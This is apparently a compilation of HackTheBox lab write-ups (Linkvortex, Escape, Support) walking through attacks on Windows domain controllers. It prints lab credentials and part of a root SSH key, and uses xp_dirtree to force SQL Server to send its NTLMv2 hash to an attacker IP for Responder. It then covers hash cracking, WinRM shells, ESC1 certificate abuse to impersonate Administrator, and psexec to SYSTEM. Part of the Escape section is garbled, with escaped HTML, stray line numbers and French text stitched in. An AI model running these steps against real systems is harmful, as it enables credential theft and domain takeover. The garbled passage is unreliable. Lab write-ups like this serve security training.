    /usr/bin/mv: 'exploit.png' and '/var/quarantined/exploit.png' are the same file
    Content:
    -----BEGIN OPENSSH PRIVATE KEY-----
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
    NhAAAAAwEAAQAAAYEAmpHVhV11MW7eGt9WeJ23rVuqlWnMpF+FclWYwp4SACcAilZdOF8T
    ...
    xmo6eXMvU90HVbakUoRspYWISr51uVEvIDuNcZUJlseINXimZkrkD40QTMrYJc9slj9wkA
    ICLgLxRR4sAx0AAAAPcm9vdEBsaW5rdm9ydGV4AQIDBA==
    -----END OPENSSH PRIVATE KEY-----

    # -------------------------------

    $ vim root.key
    $ chmod 600 root.key
    $ ssh -i root.key root@10.10.11.47
    Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
    ...
    Last login: Mon Dec  2 11:20:43 2024 from 10.10.14.61
    -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    root@linkvortex:~# whoami
    root
    root@linkvortex:~# cat root.txt
    5f3e.....ebc9

Source: HTB | Linkvortex, published 2025-10-22, https://leopoldabgn.github.io/writeups/p/linkvortex-htb/

HTB | Escape

Machine name: Escape
OS: Windows
IP: 10.10.11.202
Difficulty: Medium
Users:

    # SQL Server
    PublicUser : GuestUserCantWrite1
    sql_svc : REGGIE1234ronnie
    Ryan.cooper : NuclearMosquito3

Enumeration

nmap

    $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.202
    PORT     STATE SERVICE       REASON          VERSION
    53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
    88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 22:21:01Z)
    135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
    139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
    389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject:
    | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
    | Issuer:
    commonName=sequel-DC-CA/domainComponent=sequel
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2024-01-18T23:03:57
    | Not valid after:  2074-01-05T23:03:57
    | MD5:   ee4cc647ebb2c23ef4721d7028809d82
    | SHA-1: d88d12ae8a50fcf12242909e3dd75cff92d1a480
    | -----BEGIN CERTIFICATE-----
    | MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
    | I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw==
    |_-----END CERTIFICATE-----
    |_ssl-date: 2025-09-10T22:22:35+00:00; +8h00m00s from scanner time.
    445/tcp  open  microsoft-ds? syn-ack ttl 127
    464/tcp  open  kpasswd5?     syn-ack ttl 127
    593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
    | ssl-cert: (same sequel-DC-CA certificate as on 389/tcp)
    |_ssl-date: 2025-09-10T22:22:34+00:00; +7h59m59s from scanner time.
    1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
    |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
    | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
    | Issuer: commonName=SSL_Self_Signed_Fallback
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2025-09-10T22:17:26
    | Not valid after:  2055-09-10T22:17:26
    | MD5:   8f5d163bc1ef9dbb2b789cdf2d7b5a90
    | SHA-1: 6c89bf0840566f823a006405fce65a4f0570de19
    | -----BEGIN CERTIFICATE-----
    | MIIDADCCAeigAwIBAgIQfAGJqsgHZopA2ARCvdHiZTANBgkqhkiG9w0BAQsFADA7
    | JfvGOQ==
    |_-----END CERTIFICATE-----
    |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
    |_ssl-date: 2025-09-10T22:22:35+00:00; +8h00m00s from scanner time.
    3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
    |_ssl-date: 2025-09-10T22:22:35+00:00; +8h00m00s from scanner time.
    | ssl-cert: (same sequel-DC-CA certificate as on 389/tcp)
    3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
    | ssl-cert: (same sequel-DC-CA certificate as on 389/tcp)
    |_ssl-date: 2025-09-10T22:22:34+00:00; +7h59m59s from scanner time.
    5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-title: Not Found
    |_http-server-header: Microsoft-HTTPAPI/2.0
    9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
    49667/tcp open msrpc         syn-ack ttl 127 Microsoft Windows RPC
    49687/tcp open ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
    49688/tcp open msrpc         syn-ack ttl 127 Microsoft Windows RPC
    49706/tcp open msrpc         syn-ack ttl 127 Microsoft Windows RPC
    49709/tcp open msrpc         syn-ack ttl 127 Microsoft Windows RPC

    Host script results:
    |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
    | smb2-time:
    |   date: 2025-09-10T22:21:54
    |_  start_date: N/A
    | p2p-conficker:
    |   Checking for Conficker.C or higher...
    |   Check 1 (port 63970/tcp): CLEAN (Timeout)
    |   Check 2 (port 24393/tcp): CLEAN (Timeout)
    |   Check 3 (port 50586/udp): CLEAN (Timeout)
    |   Check 4 (port 24268/udp): CLEAN (Timeout)
    |_  0/4 checks are positive: Host is CLEAN or ports are blocked
    | smb2-security-mode:
    |   311:
    |_    Message signing enabled and required

Two things to note for later: the host is a domain controller for sequel.htb (dc.sequel.htb, with an enterprise CA named sequel-DC-CA), and the clock skew of roughly 8 hours means any Kerberos-based authentication from the attacking machine will need its clock adjusted to the DC's.

Foothold

SMB share enumeration - guest

With the guest user and an empty password, we are able to list the SMB shares.
The Public share is readable.

    $ nxc smb 10.10.11.202 -u 'guest' -p '' --shares
    SMB  10.10.11.202  445  DC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
    SMB  10.10.11.202  445  DC  [+] sequel.htb\guest:
    SMB  10.10.11.202  445  DC  [*] Enumerated shares
    SMB  10.10.11.202  445  DC  Share     Permissions  Remark
    SMB  10.10.11.202  445  DC  -----     -----------  ------
    SMB  10.10.11.202  445  DC  ADMIN$                 Remote Admin
    SMB  10.10.11.202  445  DC  C$                     Default share
    SMB  10.10.11.202  445  DC  IPC$      READ         Remote IPC
    SMB  10.10.11.202  445  DC  NETLOGON               Logon server share
    SMB  10.10.11.202  445  DC  Public    READ
    SMB  10.10.11.202  445  DC  SYSVOL                 Logon server share

Public share - "SQL Server Procedures.pdf"

The Public share holds a file named "SQL Server Procedures.pdf", readable as guest. Here I use nxc alone to locate and extract the file.

    $ nxc smb 10.10.11.202 -u 'guest' -p '' -M spider_plus
    SMB          10.10.11.202  445  DC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
    SMB          10.10.11.202  445  DC  [+] sequel.htb\guest:
    SPIDER_PLUS  10.10.11.202  445  DC  [*] Started module spidering_plus with the following options:
    SPIDER_PLUS  10.10.11.202  445  DC  [*]  DOWNLOAD_FLAG: False
    SPIDER_PLUS  10.10.11.202  445  DC  [*]     STATS_FLAG: True
    SPIDER_PLUS  10.10.11.202  445  DC  [*] EXCLUDE_FILTER: ['print$', 'ipc$']
    SPIDER_PLUS  10.10.11.202  445  DC  [*]   EXCLUDE_EXTS: ['ico', 'lnk']
    SPIDER_PLUS  10.10.11.202  445  DC  [*]  MAX_FILE_SIZE: 50 KB
    SPIDER_PLUS  10.10.11.202  445  DC  [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
    SMB          10.10.11.202  445  DC  [*] Enumerated shares
    SMB          10.10.11.202  445  DC  Share     Permissions  Remark
    SMB          10.10.11.202  445  DC  -----     -----------  ------
    SMB          10.10.11.202  445  DC  ADMIN$                 Remote Admin
    SMB          10.10.11.202  445  DC  C$                     Default share
    SMB          10.10.11.202  445  DC  IPC$      READ         Remote IPC
    SMB          10.10.11.202  445  DC  NETLOGON               Logon server share
    SMB          10.10.11.202  445  DC  Public    READ
    SMB          10.10.11.202  445  DC  SYSVOL                 Logon server share
    SPIDER_PLUS  10.10.11.202  445  DC  [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.10.11.202.json".
    SPIDER_PLUS  10.10.11.202  445  DC  [*] SMB Shares:           6 (ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL)
    SPIDER_PLUS  10.10.11.202  445  DC  [*] SMB Readable Shares:  2 (IPC$, Public)
    SPIDER_PLUS  10.10.11.202  445  DC  [*] SMB Filtered Shares:  1
    SPIDER_PLUS  10.10.11.202  445  DC  [*] Total folders found:  0
    SPIDER_PLUS  10.10.11.202  445  DC  [*] Total files found:    1
    SPIDER_PLUS  10.10.11.202  445  DC  [*] File size average:    48.39 KB
    SPIDER_PLUS  10.10.11.202  445  DC  [*] File size min:        48.39 KB
    SPIDER_PLUS  10.10.11.202  445  DC  [*] File size max:        48.39 KB

    $ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.202.json
    {
        "Public": {
            "SQL Server Procedures.pdf": {
                "atime_epoch": "2022-11-19 12:50:54",
                "ctime_epoch": "2022-11-17 20:47:32",
                "mtime_epoch": "2022-11-19 12:51:25",
                "size": "48.39 KB"
            }
        }
    }

    $ nxc smb 10.10.11.202 -u 'guest' -p '' --get-file "\\SQL Server Procedures.pdf" "SQL Server Procedures.pdf" --share Public
    SMB  10.10.11.202  445  DC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
    SMB  10.10.11.202  445  DC  [+] sequel.htb\guest:
    SMB  10.10.11.202  445  DC  [*] Copying "\SQL Server Procedures.pdf" to "SQL Server Procedures.pdf"
    SMB  10.10.11.202  445  DC  [+] File "\SQL Server Procedures.pdf" was downloaded to "SQL Server Procedures.pdf"

Credentials for MSSQL

"SQL Server Procedures.pdf" is a procedure for connecting to a SQL Server instance.

It mentions several users: Ryan, Tom, brandon.brown.

It even contains credentials for the SQL server:

PublicUser : GuestUserCantWrite1

    Bonus
    For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with user PublicUser and password GuestUserCantWrite1 . Refer to the previous guidelines and make sure to switch the "Windows Authentication" to "SQL Server Authentication".

MSSQL: xp_dirtree and Responder

With mssqlclient we connect to the SQL server as the user we just found.

We can then call the xp_dirtree extended stored procedure with a UNC path pointing at a (non-existent) share on our own machine, the attacker's IP. SQL Server tries to list that share and, to do so, authenticates over SMB as the account the service runs under, sql_svc. Responder, started beforehand and listening on our side, captures that NTLMv2 challenge/response.

    mssqlclient.py "DC"/"PublicUser":"GuestUserCantWrite1"@"10.10.11.202"
    Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies

    [*] Encryption required, switching to TLS
    [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
    [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
    [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
    [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (PublicUser guest@master)\u0026gt; xp_dirtree \\\\10.10.14.10\\fake\\file subdirectory depth file ------------ ----- ---- Ici, on observe la reception du hachage du mot de passe de l\u0026rsquo;utilisateur sql_svc.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ responder -I tun0 -w -F __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR \u0026amp; MDNS Responder 3.1.5.0 ... [+] Listening for events... [!] Error starting TCP server on port 53, check permissions or other servers running. [SMB] NTLMv2-SSP Client : 10.10.11.202 [SMB] NTLMv2-SSP Username : sequel\\sql_svc [SMB] NTLMv2-SSP Hash : sql_svc::sequel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ashcat : sql_svc password On trouve le mot de passe de sql_svc à l\u0026rsquo;aide de hashcat et la liste rockyou.txt.\n1 2 $ hashcat -m 5600 ./hash.txt ~/wordlists/rockyou.txt --show SQL_SVC::sequel:112233.....0000000:REGGIE1234ronnie ERRORLOG.BAK : Ryan.Cooper password On peut alors se connecter au compte sql_svc avec evilwinrm et obtenir un powershell sur la machine :\n1 2 $ evil-winrm -u \u0026#39;sql_svc\u0026#39; -p \u0026#39;REGGIE1234ronnie\u0026#39; -i \u0026#34;10.10.11.202\u0026#34; ... 
Ryan.Cooper's password turns up in a SQL Server log file: NuclearMosquito3. The log records a failed logon for sequel.htb\Ryan.Cooper followed, a few milliseconds later, by a failed logon for the "user" NuclearMosquito3: someone typed the password into the username field, and SQL Server writes failed login names to the error log in clear.

*Evil-WinRM* PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

*Evil-WinRM* PS C:\SQLServer\Logs> download "C:/SQLServer/Logs/ERRORLOG.BAK"
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:/SQLServer/Logs/ERRORLOG.BAK to ERRORLOG.BAK

----------------------------------

$ cat ERRORLOG.BAK | grep -i pass
2022-11-18 13:43:06.75 spid18s     Password policy update was successful.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

$ evil-winrm -u 'Ryan.Cooper' -p 'NuclearMosquito3' -i "10.10.11.202"
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> type "C:/Users/Ryan.Cooper/Desktop/user.txt"
d3b6.....cd0e

Privilege Escalation : ESC1 Template

ESC1 is the AD CS misconfiguration in which a certificate template lets the enrollee supply the subject, and therefore the subjectAltName, of the certificate it issues. Any principal allowed to enroll in such a template can request a certificate carrying another user's UPN, for instance the domain Administrator's, and then authenticate as that user with it.
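Certipy's verdict rests on several template attributes at once, not only on the SAN flag. The following is an added example, not code from this page or from Certipy, that evaluates the same ESC1 preconditions over a template record (modelled on the UserAuthentication template printed by certipy find below) and shows that changing any one of them closes the hole; the group names treated as low-privileged are an assumption of this example.

```python
"""ESC1 preconditions on a certificate template, evaluated the way
certipy find does, plus the three one-attribute fixes."""
from dataclasses import dataclass, replace
from typing import List

# Groups whose enrollment right makes a template reachable by any domain account (assumption).
LOW_PRIVILEGED = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone", "Users"}
# EKUs that make the issued certificate usable for Kerberos (PKINIT) or Schannel logon.
AUTHENTICATION_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                       "Smart Card Logon", "Any Purpose"}


@dataclass
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool        # Certificate Name Flag: EnrolleeSuppliesSubject
    extended_key_usage: List[str]
    requires_manager_approval: bool
    authorized_signatures_required: int
    enrollment_rights: List[str]           # "DOMAIN\\Group", as certipy prints them


def allows_authentication(t: Template) -> bool:
    # An empty EKU list means no usage restriction, which also permits logon.
    return not t.extended_key_usage or bool(AUTHENTICATION_EKUS & set(t.extended_key_usage))


def esc1_enrollers(t: Template) -> List[str]:
    """Low-privileged principals that can abuse the template for ESC1; empty means not vulnerable."""
    if not (t.enabled and t.enrollee_supplies_subject and allows_authentication(t)):
        return []
    if t.requires_manager_approval or t.authorized_signatures_required > 0:
        return []                          # a human or a second key must sign off on the SAN
    return [p for p in t.enrollment_rights if p.split("\\")[-1] in LOW_PRIVILEGED]


# The UserAuthentication template with the values certipy reports on this page.
USER_AUTHENTICATION = Template(
    name="UserAuthentication", enabled=True, enrollee_supplies_subject=True,
    extended_key_usage=["Client Authentication", "Secure Email", "Encrypting File System"],
    requires_manager_approval=False, authorized_signatures_required=0,
    enrollment_rights=["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                       "SEQUEL.HTB\\Enterprise Admins"])

# Each of these alone is a complete remediation.
FIXED_NO_SAN = replace(USER_AUTHENTICATION, enrollee_supplies_subject=False)
FIXED_APPROVAL = replace(USER_AUTHENTICATION, requires_manager_approval=True)
FIXED_RIGHTS = replace(USER_AUTHENTICATION,
                       enrollment_rights=["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"])
# Removing the EKU entirely does not help: no EKU is still usable for logon.
NO_EKU = replace(USER_AUTHENTICATION, extended_key_usage=[])

if __name__ == "__main__":
    for t in (USER_AUTHENTICATION, FIXED_NO_SAN, FIXED_APPROVAL, FIXED_RIGHTS, NO_EKU):
        print(t.name, "ESC1 via", esc1_enrollers(t) or "nobody")
```

Stripping the EKU list is a tempting but wrong fix: a template with no EKU can still be used for PKINIT, so the check treats it as authentication-capable, exactly like Certipy.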
Such a certificate gives privilege escalation when the template's EKU includes Client Authentication or Any Purpose (or lists no EKU at all), enrollment is open to a low-privileged group, and the template requires neither manager approval nor an authorized signature. The certipy output below confirms every one of those conditions for the UserAuthentication template.

Enumeration : certipy find

$ certipy find -u 'Ryan.cooper' -p 'NuclearMosquito3' -dc-ip 10.10.11.202 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

Requesting a Malicious Certificate

We request a certificate for Administrator through the vulnerable template:

$ certipy req -username "Ryan.cooper@sequel.htb" -p "NuclearMosquito3" -target 'dc.sequel.htb' -ca "sequel-DC-CA" -template "UserAuthentication" -upn "Administrator@sequel.htb" -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc.sequel.htb' at '127.0.0.53'
[+] Trying to resolve 'SEQUEL.HTB' at '127.0.0.53'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Certipy points out that the certificate carries no object SID. A DC that enforces strong certificate mapping (the KB5014754 enforcement mode) rejects such a certificate for PKINIT, so this only works against a DC still in compatibility mode, as here.

Fixing Kerberos Clock Skew (KRB_AP_ERR_SKEW)

The authentication first fails because of a time difference between the attacker machine and the DC (KRB_AP_ERR_SKEW: Kerberos tolerates only a few minutes of skew by default). Running the client under faketime with the DC's real time fixes it.

$ date
Fri Sep 12 12:03:10 AM CEST 2025

$ ntpdate -q 10.10.11.202
2025-09-12 08:20:53.85924 (+0200) +28800.935013 +/- 0.010303 10.10.11.202 s1 no-leap

$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

$ faketime "$(date +'%Y-%m-%d') $(net time -S 10.10.11.202 | awk '{print $4}')" zsh

$ date
Fri Sep 12 08:03:39 AM CEST 2025

$ ntpdate -q 10.10.11.202
2025-09-12 08:03:44.141842 (+0200) -0.075273 +/- 0.010154 10.10.11.202 s1 no-leap

Getting a TGT as Administrator

With the generated certificate we obtain a TGT and the NT hash of Administrator (Certipy retrieves the hash through PKINIT's U2U trick once it has the TGT):

$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Gaining Administrator Shell (psexec)

Using the TGT from the credential cache with psexec.py, we get a shell as nt authority\system:

$ export KRB5CCNAME="administrator.ccache"
$ psexec.py -k -no-pass sequel.htb/Administrator@dc.sequel.htb
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on dc.sequel.htb.....
[*] Found writable share ADMIN$
[*] Uploading file zjPAtFqg.exe
[*] Opening SVCManager on dc.sequel.htb.....
[*] Creating service cbfM on dc.sequel.htb.....
[*] Starting service cbfM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
1991.....91d7

Date: 2025-09-10. Permalink: https://leopoldabgn.github.io/writeups/p/escape-htb/. Title: HTB | Escape

HTB | Support

Machine name: Support. OS: Windows. IP: 10.10.11.174. Difficulty: Easy

Users
ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
support : Ironside47pleasure40Watchful

System Info
Windows Server 2022 Build 20348 x64

Enumeration

nmap

$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.174
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-07 16:43:36Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Foothold

Dumping users with the guest account

The guest account is enabled, so we can brute-force RIDs over SMB and extract the user names:

$ nxc smb 10.10.11.174 -u 'guest' -p ''
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\guest:

$ nxc smb 10.10.11.174 -u 'guest' -p '' --rid-brute | cut -d':' -f2 | cut -d'\' -f2 | grep TypeUser | cut -d' ' -f1 > users.txt
Administrator
Guest
krbtgt
DC$
ldap
support
smith.rosario
hernandez.stanley
...
SMB Share : support-tools

The guest account also gives us read access to the support-tools share, from which we can pull an interesting file: UserInfo.exe.zip.

$ nxc smb 10.10.11.174 -u 'guest' -p '' -M spider_plus
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\guest:
SPIDER_PLUS 10.10.11.174 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.174 445 DC [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.174 445 DC [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.174 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.174 445 DC [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.174 445 DC [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.174 445 DC [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB 10.10.11.174 445 DC [*] Enumerated shares
SMB 10.10.11.174 445 DC Share         Permissions Remark
SMB 10.10.11.174 445 DC -----         ----------- ------
SMB 10.10.11.174 445 DC ADMIN$                    Remote Admin
SMB 10.10.11.174 445 DC C$                        Default share
SMB 10.10.11.174 445 DC IPC$          READ        Remote IPC
SMB 10.10.11.174 445 DC NETLOGON                  Logon server share
SMB 10.10.11.174 445 DC support-tools READ        support staff tools
SMB 10.10.11.174 445 DC SYSVOL                    Logon server share
SPIDER_PLUS 10.10.11.174 445 DC [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.10.11.174.json".
SPIDER_PLUS 10.10.11.174 445 DC [*] SMB Shares: 6 (ADMIN$, C$, IPC$, NETLOGON, support-tools, SYSVOL)
SPIDER_PLUS 10.10.11.174 445 DC [*] SMB Readable Shares: 2 (IPC$, support-tools)
SPIDER_PLUS 10.10.11.174 445 DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.11.174 445 DC [*] Total folders found: 0
SPIDER_PLUS 10.10.11.174 445 DC [*] Total files found: 7
SPIDER_PLUS 10.10.11.174 445 DC [*] File size average: 13.96 MB
SPIDER_PLUS 10.10.11.174 445 DC [*] File size min: 77.32 KB
SPIDER_PLUS 10.10.11.174 445 DC [*] File size max: 45.87 MB

$ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.174.json
{
    "support-tools": {
        "7-ZipPortable_21.07.paf.exe": {
            "atime_epoch": "2022-05-28 13:19:19",
            "ctime_epoch": "2022-05-28 13:19:19",
